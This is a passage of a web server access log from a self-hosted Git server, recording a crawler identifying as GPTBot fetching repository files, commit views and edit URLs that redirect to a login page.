38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/index.tsx" +[17/Feb/2026:15:34:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/index.tsx" +[17/Feb/2026:15:34:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/index.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/index.tsx" +[17/Feb/2026:15:34:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/index.tsx" +[17/Feb/2026:15:34:08 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Header.tsx" +[17/Feb/2026:15:34:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 9884] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" +[17/Feb/2026:15:34:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/assets/js/i18n.js" +[17/Feb/2026:15:34:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/assets/js/i18n.js" +[17/Feb/2026:15:34:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/assets/js/i18n.js" +[17/Feb/2026:15:34:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/assets/js/i18n.js" +[17/Feb/2026:15:34:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 9921] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" +[17/Feb/2026:15:34:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx.conf?display=rendered" [Client 74.7.227.38] [Length 10853] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx.conf" +[17/Feb/2026:15:34:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10837] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/update_status.py" +[17/Feb/2026:15:34:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.gitignore?display=source" [Client 74.7.227.38] [Length 10983] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.gitignore" +[17/Feb/2026:15:34:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.gitignore?display=source" [Client 74.7.227.38] [Length 10984] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.gitignore" +[17/Feb/2026:15:34:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/update_status.py?display=source" [Client 74.7.227.38] [Length 12969] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/update_status.py" +[17/Feb/2026:15:34:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/mail_contact.py?display=rendered" [Client 74.7.227.38] [Length 10889] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/mail_contact.py" +[17/Feb/2026:15:34:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/update_status.py?display=source" [Client 74.7.227.38] [Length 12964] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/update_status.py" +[17/Feb/2026:15:34:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/mail_contact.py?display=rendered" [Client 74.7.227.38] [Length 10890] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/mail_contact.py" +[17/Feb/2026:15:34:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10839] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/update_status.py" +[17/Feb/2026:15:34:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10836] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/update_status.py" +[17/Feb/2026:15:34:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/update_status.py?display=source" [Client 74.7.227.38] [Length 12965] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/update_status.py" +[17/Feb/2026:15:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx-reverse-proxy.conf?display=source" [Client 74.7.227.38] [Length 11674] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx-reverse-proxy.conf" +[17/Feb/2026:15:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.gitignore?display=source" [Client 74.7.227.38] [Length 10953] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.gitignore" +[17/Feb/2026:15:34:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx.conf?display=rendered" [Client 74.7.227.38] [Length 10883] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx.conf" +[17/Feb/2026:15:34:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/mail_contact.py?display=rendered" [Client 74.7.227.38] [Length 10890] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/mail_contact.py" +[17/Feb/2026:15:34:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/update_status.py?display=source" [Client 74.7.227.38] [Length 12965] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/update_status.py" +[17/Feb/2026:15:34:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx.conf?display=source" [Client 74.7.227.38] [Length 11980] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx.conf" +[17/Feb/2026:15:34:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx-reverse-proxy.conf?display=source" [Client 74.7.227.38] [Length 11644] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx-reverse-proxy.conf" +[17/Feb/2026:15:34:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10880] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.gitignore" +[17/Feb/2026:15:34:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10848] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.gitignore" +[17/Feb/2026:15:34:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/mail_contact.py?display=source" [Client 74.7.227.38] [Length 16090] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/mail_contact.py" +[17/Feb/2026:15:34:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10835] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/update_status.py" +[17/Feb/2026:15:34:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx.conf?display=rendered" [Client 74.7.227.38] [Length 10885] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx.conf" +[17/Feb/2026:15:34:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx.conf?display=source" [Client 74.7.227.38] [Length 11978] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx.conf" +[17/Feb/2026:15:34:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/mail_contact.py?display=source" [Client 74.7.227.38] [Length 16089] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/mail_contact.py" +[17/Feb/2026:15:34:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx.conf?display=source" [Client 74.7.227.38] [Length 11947] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx.conf" +[17/Feb/2026:15:34:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10879] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.gitignore" +[17/Feb/2026:15:34:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2findex.html" [Client 74.7.227.38] [Length 35245] [Gzip 7.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html" +[17/Feb/2026:15:34:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13158] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services/geminiService.ts" +[17/Feb/2026:15:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/index.html?display=rendered" [Client 74.7.227.38] [Length 10877] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/index.html" +[17/Feb/2026:15:34:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/keys.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/keys.json" +[17/Feb/2026:15:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/keys.json" +[17/Feb/2026:15:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/index.html?display=rendered" [Client 74.7.227.38] [Length 10877] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/index.html" +[17/Feb/2026:15:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/index.html?display=rendered" [Client 74.7.227.38] [Length 10876] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/index.html" +[17/Feb/2026:15:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.vscode/settings.json" [Client 74.7.227.38] [Length 11659] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode" +[17/Feb/2026:15:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.gitignore" +[17/Feb/2026:15:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log?display=source" [Client 74.7.227.38] [Length 27659] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log" +[17/Feb/2026:15:34:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/keys.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/keys.json" +[17/Feb/2026:15:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/keys.json" +[17/Feb/2026:15:34:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/keys.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/keys.json" +[17/Feb/2026:15:34:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/keys.json" +[17/Feb/2026:15:34:30 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Header.tsx" +[17/Feb/2026:15:34:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/components/Footer.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Footer.tsx" +[17/Feb/2026:15:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/components/Footer.tsx" +[17/Feb/2026:15:34:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/components/Header.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Header.tsx" +[17/Feb/2026:15:34:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/components/Header.tsx" +[17/Feb/2026:15:34:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/components/Contact.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/components/Contact.tsx" +[17/Feb/2026:15:34:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/components/Contact.tsx" +[17/Feb/2026:15:34:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/components/Hero.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Hero.tsx" +[17/Feb/2026:15:34:33 +0000] - 200 